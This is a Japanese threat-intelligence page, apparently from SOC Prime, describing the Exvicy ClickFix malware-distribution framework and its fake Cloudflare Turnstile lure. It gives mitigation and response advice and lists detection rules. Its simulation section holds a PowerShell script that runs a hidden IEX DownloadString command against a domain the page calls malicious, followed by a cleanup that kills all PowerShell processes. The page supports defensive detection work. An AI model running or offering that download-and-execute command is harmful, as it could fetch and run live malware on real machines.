SOC Prime Bias: High

24 Sep 2026 06:51 UTC

Exvicy:ErrTrafficマルウェア配布フレームワークの模倣者

Author Photo
SOC Prime Team linkedin icon フォローする
Exvicy:ErrTrafficマルウェア配布フレームワークの模倣者
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

Exvicyは、新たなMalware-as-a-Service (MaaS) ClickFix配布フレームワークであり、サイバー犯罪フォーラムで宣伝されています。ユーザーにWindowsの実行ダイアログを介して悪意あるPowerShellコマンドを実行させるために、Cloudflare Turnstileチャレンジを模倣するソーシャルエンジニアリングを使用しています。このフレームワークはErrTrafficを綿密に模倣しており、JavaScriptのコードベースや難読化技術を大部分再利用しています。

調査

TDRアナリストは、Exploit.INフォーラムで共有された管理パネルのスクリーンショットから、アクティブなC2インフラストラクチャを発見しました。特定のCloudflareネームサーバーとドメイン登録パターンを分析することで、研究者は複数の悪意あるドメインやWordPressの侵害されたウェブサイトを特定しました。技術分析により、特徴的なJavaScript関数と逆分析回避ロジックを含むErrTrafficコードの広範な再利用が確認されました。

緩和策

組織はこれらのキャンペーンに関連する既知の悪意あるドメインや疑わしいTLDをブロックするために、堅牢なウェブフィルタリングを展開する必要があります。特にコマンドを含む異常なPowerShellの実行を監視し制限するために、エンドポイント保護も必要です。 irm or iex。ユーザーはキーボードショートカットを使用するよう指示するソーシャルエンジニアリングのプロンプトを識別するために訓練されるべきです。 Win+R を使用してコマンドを実行します。

対応

Exvicyの活動が検出された場合、追加のコマンド実行やペイロード配信を防ぐために、影響を受けたホストを直ちに隔離するべきです。レスポンダーは、実行されたコマンドと関連するネットワーク接続を特定するために、PowerShellの運用ログを確認するべきです。既知のC2 IPアドレスとドメインは、環境内の他の侵害されたWordPressアセットを確認するためのスイープの後に、境界でブロックされるべきです。

攻撃の流れ

この部分はまだ更新中です。

検出

異常なトップレベルドメイン(TLD)DNS要求による疑わしいコマンド&コントロール(dns経由)

SOCプライムチーム
2026年9月23日

LOLBinのセマンティクスを持つ疑わしいRunMRUエントリ(registry_event経由)

SOCプライムチーム
2026年9月23日

検出されるIOCs(SourceIP):Exvicy:ErrTrafficマルウェア配布フレームワークの模倣品

SOCプライムAIルール
2026年9月23日

検出されるIOCs(DestinationIP):Exvicy:ErrTrafficマルウェア配布フレームワークの模倣品

SOCプライムAIルール
2026年9月23日

Exvicyマルウェアの悪意あるPowerShellコマンド実行の検出 [Windows Powershell]

SOCプライムAIルール
2026年9月23日

Win + Rショートカット経由でのExvicyフレームワークコマンド実行 [Windowsプロセス作成]

SOCプライムAIルール
2026年9月23日

シミュレーション実行

  • 攻撃のシナリオとコマンド: 攻撃者はフィッシングを通じてユーザーに悪意のあるショートカットまたは文書を届けます。実行時(T1204.002)、ユーザーは無意識のうちにPowerShellプロセス(T1059.001)をトリガーします。攻撃者の目的は、二次ペイロードをダウンロードすることで足場を築くことです。Exvicyフレームワークを模倣するために、コマンドラインは特定の既知の悪意のあるドメインを含むように作成されています。 recaptcha-check.com/8E9curHNH8UfAMLz 悪意のあるエージェントを引き出すため。

  • リグレッションテストスクリプト:

    # Exvicy検出ルールをトリガーするシミュレーションスクリプト。
    # Sigmaルールで特定されたコマンドラインパターンを模倣します。
    
    $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz"
    $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`""
    
    Write-Host "[+] シミュレーション開始:検出をトリガーするコマンドを実行中..."
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`""
    Write-Host "[+] シミュレーションコマンドが送信されました。SIEMでアラートを確認してください。"
  • クリーンアップコマンド:

    # クリーンアップ:この特定のシミュレーションでは永続ファイルは作成されませんが、
    # 残存するPowerShellプロセスが稼働していないことを確認します。
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue
    Write-Host "[+] クリーンアップ完了。"